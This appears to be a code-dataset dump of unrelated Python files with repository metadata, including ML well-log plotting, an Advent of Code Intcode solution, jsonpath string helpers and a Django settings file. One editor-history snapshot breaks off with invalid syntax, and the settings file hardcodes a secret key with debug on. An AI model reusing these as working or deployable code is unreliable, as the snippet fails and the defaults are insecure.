if len(self.buffer[channel]) > self.buffsize: self.buffer[channel].pop(self.buffsize)
return 1
saveLast = urlSnarfer(saveLast)
#####################
### Utilities ###
#####################
def _sendMsg(self, irc, msg):
irc.queueMsg(msg)
irc.noReply()
Class = General
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| [
"antb@home"
] | antb@home |
a83270f6d427c435029af0bb9b9d25f6cecb3ade | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/containsDuplicate_20200907094218.py | 458d5b60e59b1430badf47c2855449f00123736e | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | def duplicate(nums,k,t):
m = None
n = None
for i in range(len(nums)):
for j in range(i+1,len(nums)):
if abs(nums[i] - nums[j]) <= t:
m = i
n = j
if nums[m]
duplicate([1,2,3,1],3,0)
| [
"[email protected]"
] | |
04dad20bfc067a777d7795de17a2478da378fbba | 1b862f34c125ce200244dd79e4fda4b5b605ce2e | /.history/ML_T2_Validation_20210612125732.py | a3e3c1f66f5dc1ddb190e134a71155157cd4acab | [] | no_license | edwino26/CoreImages | 26085a49cf1cb79442ae563a88354b2fdceace87 | 6bf6e68cac8ab36c87b1e6ea702bfe6882b0f40e | refs/heads/master | 2023-06-22T12:53:37.344895 | 2021-07-21T04:31:44 | 2021-07-21T04:31:44 | 309,553,247 | 0 | 4 | null | 2021-04-29T23:23:15 | 2020-11-03T02:45:07 | Lasso | UTF-8 | Python | false | false | 9,251 | py | #T2 TEST DATA
# %%
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pickle
from scipy import interpolate
from scipy.integrate import simps
from numpy import trapz
# %%
#Load Stack
UVStack = pd.read_excel('./ML_Results/T2_test/ImgStack.xls')
ImgStackk = UVStack.copy().to_numpy()
# %%
def integrate(y_vals, h):
i = 1
total = y_vals[0] + y_vals[-1]
for y in y_vals[1:-1]:
if i % 2 == 0:
total += 2 * y
else:
total += 4 * y
i += 1
return total * (h / 3.0)
# %% Load and resample "results" (res) file
sub = pd.read_excel('./ML_Results/T2_test/sub.xls')
res = pd.read_excel('./ML_Results/T2_test/Results.xls')
res = res[res.Well == 'T2']
res.sort_values(by=['DEPT'])
res.drop(['Unnamed: 0', 'Set'], axis=1, inplace=True)
res.reset_index(inplace=True, drop=True)
dep = np.arange(min(res.DEPT), max(res.DEPT),0.5) #res is not at 0.5 thanks to balancing
res_rs = pd.DataFrame(columns=[res.columns])
res_rs.DEPT = dep
for i in range(len(res.columns)):
if i != 8:
f = interpolate.interp1d(res.DEPT, res.iloc[:,i])
res_rs.iloc[:,i] =f(dep)
else:
res_rs.iloc[:,i] = res.Well[0]
#T2_rs.dropna(inplace=True)
res = res_rs.copy()
difference = res.DEPT.diff()
difference.describe()
# %%
TT = pd.read_excel('./ML_Results/Train_Test_Results.xls')
istr = 0
iend = 42344
dplot_o = 3671
dplot_n = 3750
shading = 'bone'
# %% Load Log Calculations
T2_x = pd.read_excel('./Excel_Files/T2.xls',sheet_name='T2_data')
T2_x = T2_x[['DEPTH','GR_EDTC','RHOZ','AT90','NPHI','Vsh','Vclay','grain_density','porosity',
'RW2','Sw_a','Sw_a1','Sw_p','Sw_p1','SwWS','Swsim','Swsim1','PAY_archie',
'PAY_poupon','PAY_waxman','PAY_simandoux']]
# %%
T2_rs = pd.DataFrame(columns=[T2_x.columns])
T2_rs.iloc[:,0] = dep
for i in range(len(T2_x.columns)):
f = interpolate.interp1d(T2_x.DEPTH, T2_x.iloc[:,i])
T2_rs.iloc[:,i] =f(dep)
#T2_rs.dropna(inplace=True)
T2_x = T2_rs.copy()
difference_T2 = T2_x.DEPTH.diff()
difference.describe()
# %%
plt.figure()
plt.subplot2grid((1, 10), (0, 0), colspan=3)
plt.plot(sub['GRAY'], sub['DEPTH'], 'mediumseagreen', linewidth=0.5);
plt.axis([50, 250, dplot_o, dplot_n]);
plt.gca().invert_yaxis();
plt.fill_between(sub['GRAY'], 0, sub['DEPTH'], facecolor='green', alpha=0.5)
plt.xlabel('Gray Scale RGB')
plt.subplot2grid((1, 10), (0, 3), colspan=7)
plt.imshow(ImgStackk[istr:iend,80:120], aspect='auto', origin='upper', extent=[0,1,dplot_n,dplot_o], cmap=shading);
plt.axis([0, 1, dplot_o, dplot_n]);
plt.gca().invert_yaxis()
plt.xlabel('Processed Image')
plt.colorbar()
p_50 = np.percentile(sub['DEPTH'], 50)
plt.yticks([]); plt.xticks([])
plt.subplots_adjust(wspace = 20, left = 0.1, right = 0.9, bottom = 0.1, top = 0.9)
plt.show()
# %%
CORE =pd.read_excel('./CORE/CORE.xlsx',sheet_name='XRD')
mask = CORE.Well.isin(['T2'])
T2_Core = CORE[mask]
prof=T2_Core['Depth']
clays=T2_Core['Clays']
xls1 = pd.read_excel ('./CORE/CORE.xlsx', sheet_name='Saturation')
mask = xls1.Well.isin(['T2'])
T2_sat = xls1[mask]
long=T2_sat ['Depth']
poro=T2_sat ['PHIT']
grain=T2_sat ['RHOG']
sw_core=T2_sat ['Sw']
klinkenberg = T2_sat ['K']
minimo=grain.min()
maximo=grain.max()
c=2.65
d=2.75
norm=(((grain-minimo)*(d-c)/(maximo-minimo))+c)
xls2 = pd.read_excel ('./CORE/CORE.xlsx', sheet_name='Gamma')
mask = xls2.Well.isin(['T2'])
T2_GR = xls2[mask]
h=T2_GR['Depth']
cg1=T2_GR['GR_Scaled']
# %%
# ~~~~~~~~~~~~~~~~~~ Plot Results ~~~~~~~~~~~~~~~~~~~~~~
ct = 0
top= dplot_o
bottom= dplot_n
no_plots = 9
ct+=1
plt.figure(figsize=(10,9))
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.GR_EDTC,T2_x.DEPTH,'g', lw=3)
#plt.fill_between(T2_x.GR_EDTC.values.reshape(-1), T2_x.DEPTH.values.reshape(-1), y2=0,color='g', alpha=0.8)
plt.title('$GR/ Core.GR $',fontsize=8)
plt.axis([40,130,top,bottom])
plt.xticks(fontsize=8)
plt.yticks(fontsize=8)
plt.xlabel('Gamma Ray ',fontsize=6)
plt.gca().invert_yaxis()
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.PAY_poupon,T2_x.DEPTH,'r',lw=0.5)
h_P = integrate(T2_x.PAY_poupon.values, 0.5)
plt.title('$PAY_P$',fontsize=8)
plt.fill_between(T2_x.PAY_poupon.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='r', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
#Waxman-Smits
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.PAY_waxman,T2_x.DEPTH,'g',lw=0.5)
h_WS = integrate(T2_x.PAY_waxman.values, 0.5)
plt.title('$PAY_W$',fontsize=8)
plt.fill_between(T2_x.PAY_waxman.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='g', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
#Simandoux
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (T2_x.PAY_simandoux,T2_x.DEPTH,'y',lw=0.5)
h_S = integrate(T2_x.PAY_simandoux.values, 0.5)
plt.title('$PAY_S$',fontsize=8)
plt.fill_between(T2_x.PAY_simandoux.values.reshape(-1),T2_x.DEPTH.values.reshape(-1), color='y', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
ct+=1 #RGB Gray from Image
plt.subplot(1,no_plots,ct)
plt.plot(sub['GRAY'], sub['DEPTH'], 'mediumseagreen', linewidth=0.5);
plt.axis([50, 250, dplot_o, dplot_n]);
plt.xticks(fontsize=8)
plt.title('$Core Img$',fontsize=8)
plt.gca().invert_yaxis();
plt.gca().yaxis.set_visible(False)
plt.fill_between(sub['GRAY'], 0, sub['DEPTH'], facecolor='green', alpha=0.5)
plt.xlabel('Gray Scale RGB', fontsize=7)
ct+=1 # True UV from Image
plt.subplot(1,no_plots,ct, facecolor='#302f43')
corte= 170
PAY_Gray_scale = res['GRAY'].copy()
PAY_Gray_scale.GRAY[PAY_Gray_scale.GRAY<corte] = 0
PAY_Gray_scale.GRAY[PAY_Gray_scale.GRAY>=corte] = 1
h_TRUE_UV = integrate(PAY_Gray_scale.values, 0.5)
plt.plot (PAY_Gray_scale,res.DEPT,'#7d8d9c',lw=0.5)
plt.title('$OBJETIVO$',fontsize=8)
plt.fill_between(PAY_Gray_scale.values.reshape(-1),res.DEPT.values.reshape(-1), color='#7d8d9c', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.xlabel('Resolution to Log Scale',fontsize=7)
ct+=1
plt.subplot(1,no_plots,ct)
plt.imshow(ImgStackk[istr:iend,80:120], aspect='auto', origin='upper', extent=[0,1,dplot_n,dplot_o], cmap=shading);
plt.axis([0, 1, dplot_o, dplot_n]);
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.xlabel('Stacked UV Photos', fontsize=7)
plt.colorbar()
p_50 = np.percentile(sub['DEPTH'], 50)
plt.yticks([]); plt.xticks([])
ct+=1
plt.subplot(1,no_plots,ct)
plt.plot (res['RandomForest'],res.DEPT,'r',lw=1)
plt.plot (res.GRAY,res.DEPT,'k',lw=0.5)
plt.title('Machine Learning',fontsize=8)
plt.axis([0,2,top,bottom])
plt.xticks(fontsize=8)
plt.xlabel('RandomForest',fontsize=7)
plt.gca().invert_yaxis()
plt.gca().invert_xaxis()
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.xlim(0, 255)
plt.hlines(y=3665.65, xmin=0, xmax=130)
plt.hlines(y=3889.5, xmin=0, xmax=130)
ct+=1
plt.subplot(1,no_plots,ct, facecolor='#302f43')
PAY_Gray_scale2 = res['RandomForest'].copy().rename(columns={'RandomForest':'GRAY'})
PAY_Gray_scale2.GRAY[PAY_Gray_scale2.GRAY<corte] = 0
PAY_Gray_scale2.GRAY[PAY_Gray_scale2.GRAY>=corte] = 1
h_ML = integrate(PAY_Gray_scale2.values, 0.5)
plt.plot (PAY_Gray_scale2, res.DEPT,'#7d8d9c',lw=0.5)
plt.title('$RESULTADO: TEST Set$',fontsize=8)
plt.fill_between(PAY_Gray_scale2.values.reshape(-1),res.DEPT.values.reshape(-1), color='#7d8d9c', alpha=0.8)
plt.axis([0.01,0.0101,top,bottom])
plt.xticks(fontsize=8)
plt.gca().invert_yaxis()
plt.gca().xaxis.set_visible(False)
plt.gca().yaxis.set_visible(False)
plt.grid(True)
plt.suptitle('Pozo T2: Comparación Final')
plt.show()
# %%
# %%
plt.figure(figsize=(10,9))
plt.subplot(1,1,1)
plt.plot(res.GRAY, res['RandomForest'], 'ko')
plt.plot(res.GRAY, res.GRAY, 'r')
plt.xlim(0, 255)
plt.ylim(0, 255)
plt.xlabel('Valor en Escala de Gris Suavizado a res. de Registros',fontsize=17)
plt.ylabel('Predicción de Escala de Gris usando Random Forest',fontsize=17)
plt.show()
# %% Erro Calculation
# T2_x.PAY_poupon,T2_x.DEPTH
# T2_x.PAY_waxman
# T2_x.PAY_simandoux
def integrate(y_vals, h):
i = 1
total = y_vals[0] + y_vals[-1]
for y in y_vals[1:-1]:
if i % 2 == 0:
total += 2 * y
else:
total += 4 * y
i += 1
return total * (h / 3.0)
# %%
pay = pd.DataFrame(columns=['Poupon', 'Waxman_Smits', 'Simandoux', 'Machine_L', 'True_UV'])
pay.Poupon = h_P
pay.Waxman_Smits = h_WS
pay.Simandoux = h_S
pay.Machine_L = h_ML
pay.True_UV = h_TRUE_UV
pay.head()
#rmse['Poupon'] = mean_squared_error(y_test, y_pred_test, squared=False)
# %%
| [
"[email protected]"
] | |
b1a7fc689b623866f4aec9ced8da6ca250e1cc48 | e5cd01fd620e8e746a20b883de7ac32bec4feb5c | /Ejercicios python/PE7/PE7E4.py | 1b13263e7dde6dfb7f5fa46c512b4da81767aed9 | [] | no_license | eazapata/python | 0f6a422032d8fb70d26f1055dc97eed83fcdc572 | 559aa4151093a120527c459a406abd8f2ff6a7d8 | refs/heads/master | 2020-08-27T09:19:29.395109 | 2019-11-23T20:11:14 | 2019-11-23T20:11:14 | 217,314,818 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | #Escribe un programa que pida una frase, y le pase como
#parámetro a una función dicha frase. La función debe
#sustituir todos los espacios en blanco de una frase
#por un asterisco, y devolver el resultado para que el
#programa principal la imprima por pantalla.
def quitaespacio(x):
x=x.replace(" ","*");
return (x)
frase=str(input("Escribe una frase: "))
sinespacios=quitaespacio(frase)
print(sinespacios)
| [
"[email protected]"
] | |
1f35b67c23f1552af6886e53be9c92cde29f3333 | fcb5267ea83fe2f15922b5f405e534d5c37bd560 | /day21/day21a_ext.py | 249175f48203607f0023520fd97cc3348b92a4b2 | [
"MIT"
] | permissive | kannix68/advent_of_code_2019 | b3d02b695a167028bd09e72a224d89680844aade | b02a86e1f8e83111973cc2bc8c7f4d5dcf1c10aa | refs/heads/master | 2020-09-30T16:33:47.871407 | 2020-01-10T21:00:50 | 2020-01-10T21:00:50 | 227,325,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | # external solution by mcpower
# see: https://github.com/mcpower/adventofcode
# name input as input.txt
import sys; sys.dont_write_bytecode = True; from utils import *
"""
Strings, lists, dicts:
lmap, ints, positive_ints, floats, positive_floats, words
Data structures:
Linked, UnionFind
dict: d.keys(), d.values(), d.items()
deque: q[0], q.append and q.popleft
List/Vector operations:
GRID_DELTA, OCT_DELTA
lget, lset, fst, snd
padd, pneg, psub, pmul, pdot, pdist1, pdist2sq, pdist2
Matrices:
matmat, matvec, matexp
"""
from intcodev1 import *
def do_case(inp: str, sample=False):
# READ THE PROBLEM FROM TOP TO BOTTOM OK
def sprint(*a, **k): sample and print(*a, **k)
lines = inp.splitlines()
prog = Intcode(ints(inp))
# prog.run_interactive()
MY_PROG = """
NOT A T
OR T J
NOT B T
OR T J
NOT C T
OR T J
NOT D T
NOT T T
AND T J
WALK
""".strip() + "\n"
inputs = list(map(ord, MY_PROG))
halted, output = prog.run_multiple(inputs)
Intcode.print_output(output)
return # RETURNED VALUE DOESN'T DO ANYTHING, PRINT THINGS INSTEAD
run_samples_and_actual([
# Part 1
r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
"""],[
# Part 2
r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
""",r"""
"""], do_case)
| [
"[email protected]"
] | |
2a91321f84c7bf043df76df27261026d41dd5a72 | b0475ce87641476199f8c46aa3adb9e56e1061fc | /jsonpath_ng/ext/string.py | d463967aaa487e42e9bbc3c56cdd08bc75ab4329 | [
"Apache-2.0"
] | permissive | antonstakhouski/jsonpath-ng | 0acca321022de418fd779923ac8b830b77b0046f | 8cacb50796e250a4f9fab0ca0ccf3b20cf082fd8 | refs/heads/master | 2022-01-06T22:39:35.044002 | 2019-06-27T14:12:57 | 2019-06-27T14:12:57 | 274,714,446 | 1 | 0 | Apache-2.0 | 2020-06-24T16:17:52 | 2020-06-24T16:17:52 | null | UTF-8 | Python | false | false | 2,598 | py | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from .. import DatumInContext, This
SUB = re.compile("sub\(/(.*)/,\s+(.*)\)")
SPLIT = re.compile("split\((.),\s+(\d+),\s+(\d+|-1)\)")
class DefintionInvalid(Exception):
pass
class Sub(This):
"""Regex subtituor
Concrete syntax is '`sub(/regex/, repl)`'
"""
def __init__(self, method=None):
m = SUB.match(method)
if m is None:
raise DefintionInvalid("%s is not valid" % method)
self.expr = m.group(1).strip()
self.repl = m.group(2).strip()
self.regex = re.compile(self.expr)
self.method = method
print("%r" % self)
def find(self, datum):
datum = DatumInContext.wrap(datum)
value = self.regex.sub(self.repl, datum.value)
if value == datum.value:
return []
else:
return [DatumInContext.wrap(value)]
def __eq__(self, other):
return (isinstance(other, Sub) and self.method == other.method)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.method)
def __str__(self):
return '`sub(/%s/, %s)`' % (self.expr, self.repl)
class Split(This):
"""String splitter
Concrete syntax is '`split(char, segment, max_split)`'
"""
def __init__(self, method=None):
m = SPLIT.match(method)
if m is None:
raise DefintionInvalid("%s is not valid" % method)
self.char = m.group(1)
self.segment = int(m.group(2))
self.max_split = int(m.group(3))
self.method = method
def find(self, datum):
datum = DatumInContext.wrap(datum)
try:
value = datum.value.split(self.char, self.max_split)[self.segment]
except Exception:
return []
return [DatumInContext.wrap(value)]
def __eq__(self, other):
return (isinstance(other, Sub) and self.method == other.method)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.method)
def __str__(self):
return '`%s`' % self.method
| [
"[email protected]"
] | |
de3c13459fa4c91f66c0dd232ec9b25575a4fe77 | 857b8979e587a5993a3362ae267a90b218413518 | /Warmup/timeconversion.py | 968831656e7611361c7a358102cb89edc4eebf59 | [] | no_license | GRinaldi97/PCSIIH2 | 08074ec0f696110f4ea0c8dce10d2f7d91a9b25f | dc8791aa226441ea6587335e2e6fcd9a0473bb27 | refs/heads/master | 2021-05-06T20:30:03.877828 | 2017-11-28T09:52:20 | 2017-11-28T09:52:20 | 112,308,371 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | #!/bin/python3
import sys
def timeConversion(s):
L=s.split(":")
if L[-1][-2:] =='AM':
if L[0]=="12":
L[0]="00"
L[-1]= L[-1][:2]
else:
if (int(L[0]))==12:
L[-1]= L[-1][:2]
else:
L[0] = str(int(L[0])+ 12)
L[-1]= L[-1][:2]
return ":".join(L)
s = input().strip()
result = timeConversion(s)
print(result)
| [
"[email protected]"
] | |
def169ee9056eaa842fac83a407d9e4fe98eadd5 | 3319aeddfb292f8ab2602840bf0c1e0c2e5927be | /python/fp/lists.py | ccb0c857fc2aa5458d4ad2cadced3d896d8aca44 | [] | no_license | slaash/scripts | 4cc3eeab37f55d822b59210b8957295596256936 | 482fb710c9e9bcac050384fb5f651baf3c717dac | refs/heads/master | 2023-07-09T12:04:44.696222 | 2023-07-08T12:23:54 | 2023-07-08T12:23:54 | 983,247 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 79 | py | #!/usr/bin/python
l=range(0,100)
i=iter(l)
for i in iter(l):
print(i)
| [
"[email protected]"
] | |
ae860b7bf43311fe416a63cf0c493b2ed218d7f5 | 2de130eadae04a40884c2692a13d7999621dfd9f | /Python/Tarea/Guia2/3_fecha_como_cadena.py | 7fcc5526521b8893744116df0fcd6b3b5b9db0a7 | [
"MIT"
] | permissive | marce1994/Learning | e11e33496f6a536e9d64cb015fa90ff4dd9ce2cf | 2b5928cf16c0d25bfc130ad4df9d415475395ec3 | refs/heads/main | 2023-06-17T11:35:14.308755 | 2021-07-22T15:34:07 | 2021-07-22T15:34:07 | 373,610,558 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | cadena_ingresada = input("Ingrese la fecha actual en formato dd/mm/yyyy: ");
separado = cadena_ingresada.split('/');
print(separado);
print(
f'Dia: {separado[0]}', '-',
f'Mes: {separado[1]}', '-',
f'Anio: {separado[2]}'
);
c = cadena_ingresada;
print(
f'Dia: {c[0]}{c[1]}', '-',
f'Mes: {c[3]}{c[4]}', '-',
f'Anio: {c[6]}{c[7]}{c[8]}{c[9]}'
);
| [
"[email protected]"
] | |
dc9873589ffbfb60b12635001740f6860f245eb0 | c6442366f1791a3e384a7298b41a70bcda6d0107 | /fahtocel.py | 828f4ed97c583c72bdc3b7cbe7da4a979bb72406 | [] | no_license | srikrishna777/python | eb8970ad9b22e5f836627bb36e152d0a26dc4526 | 78f56724d722676ef3fe2ee0ebe3bebbfd9ecb56 | refs/heads/master | 2023-06-14T08:20:38.214513 | 2021-07-14T15:50:24 | 2021-07-14T15:50:24 | 292,761,941 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | Fahrenheit =int(input("Enter Fahrenheit: "))
Celsius = (Fahrenheit - 32) * 5/9
print("the value of Celsius is" ,Celsius)
| [
"[email protected]"
] | |
bbddaea0e02684bcad5e5059bded52512c484070 | a23ee3eb7218985cc9297faef698d3d5651565d2 | /recipe_fork/recipe_fork/settings.py | 69e0407485934862c82e25dbb3852f569dd48437 | [] | no_license | suxxxoi/recipe_fork | ea402eec5657af0978d90c1fcc308f34358f8741 | 04d80c1402a0f6acbfc989076f6474245eac1b25 | refs/heads/master | 2023-01-23T03:22:51.913739 | 2020-12-02T10:56:48 | 2020-12-02T10:56:48 | 284,443,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,406 | py | """
Django settings for recipe_fork project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '0(3nuwepfk_x!@-vi)(x&e47y(bbtzfk!2h2)obw#7hguyl*o)'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'user.apps.UserConfig',
'user_index.apps.UserIndexConfig',
'recipe.apps.RecipeConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'recipe_fork.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'recipe_fork.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| [
"[email protected]"
] | |
d2f43ec0f5c50ef641f8a57903e8005945738a71 | 3a462a714408cc0f5c01d1336f301ed1ba30a53e | /strategy.py | 4c87c6c45667a9b85a393a60285cbaae030c675b | [] | no_license | opz/gdax_order_book_trader | ee23e7e0be880042ec6cf83571b322351cf5ba50 | fe9253a18d011dab110950774002f242d7cf2b1f | refs/heads/master | 2018-10-14T03:04:44.239295 | 2017-12-01T16:56:29 | 2017-12-01T16:56:29 | 112,248,110 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,078 | py | from decimal import Decimal, InvalidOperation
import logging
logger = logging.getLogger(__name__)
class Strategy:
"""
Base class for trading strategy implementations
Attributes:
trader: An instance of :class:`GDAXTrader`.
accounts: GDAX account data
bid_orders: GDAX order book bid data
ask_orders: GDAX order book ask data
"""
def __init__(self):
self.trader = None
self.accounts = []
self.bid_orders = None
self.ask_orders = None
self.set_up()
def set_up(self):
"""
Override in child class to run code on initialization
"""
pass
def add_trader(self, trader):
self.trader = trader
def next(self):
"""
Must be implemented by child class
Strategy logic goes in this method.
The instance variable dictionaries available to strategies have the
following fields:
accounts:
- id
- currency
- balance
- available
- hold
- profile_id
"""
raise NotImplementedError
def next_data(self, accounts, bid_orders, ask_orders):
"""
Set data to be used for the current strategy iteration
:param accounts: accounts data
:param bid_orders: order book bid data
:param ask_orders: order book ask data
"""
self.accounts = accounts
self.bid_orders = bid_orders
self.ask_orders = ask_orders
def get_currency_balance(self, currency):
"""
Get the current account balance for a currency
:param currency: the currency to get the balance for
:returns: the balance of the account
"""
for account in self.accounts:
try:
if account['currency'] == currency:
return Decimal(account['balance'])
except (KeyError, TypeError, InvalidOperation):
continue
return Decimal(0)
| [
"[email protected]"
] | |
ef9bfca4ec8c994e9d2c9fc630c5971675320583 | 01457e05d0b550eccf2d677e78d04d032326288d | /migrations/versions/f743ab141e32_posts_table.py | d9e63340ab53d1e87ae6f89aab8e7c9e60e75142 | [] | no_license | nessig12/Connect21 | d87e2ca18101777e05cc7c2493bd5a8969115107 | c5dd30fdf8de34625f4d0049534df7e8f586427d | refs/heads/master | 2022-12-10T11:57:35.365588 | 2020-04-24T20:27:59 | 2020-04-24T20:27:59 | 203,684,184 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,057 | py | """posts table
Revision ID: f743ab141e32
Revises: 8f164b7b3fc3
Create Date: 2020-02-05 16:19:35.074665
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f743ab141e32'
down_revision = '8f164b7b3fc3'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('post',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('body', sa.String(length=140), nullable=True),
sa.Column('timestamp', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_post_timestamp'), table_name='post')
op.drop_table('post')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
7c545b2539b091a80362983c3601a5370b3900d0 | 5869de949e274cbaa016bfd52b5b4ab9814de49f | /utils/tester.py | 0598481151fb1aec9ca493e6a4a1aa90491f7908 | [] | no_license | samherring99/ContentBasedMIR | 018a59e8b90f3715ef93fb6c80ec7ee9cf2ed7ad | 787e53f4b1896fb95d66ce110ce4327571b64a4b | refs/heads/master | 2022-06-12T04:45:23.900073 | 2020-05-06T17:04:49 | 2020-05-06T17:04:49 | 261,822,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | import csv
with open('fma_metadata/tracks.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 2
for row in csv_reader:
if line_count == 2:
#print(f'Column names are {", ".join(row)}')
line_count += 1
else:
if str(row[40]) != "":
thing = row[0].zfill(6)
print(f'\t{thing} {row[40]}')
line_count += 1
#print(f'Processed {line_count} lines.')
| [
"[email protected]"
] | |
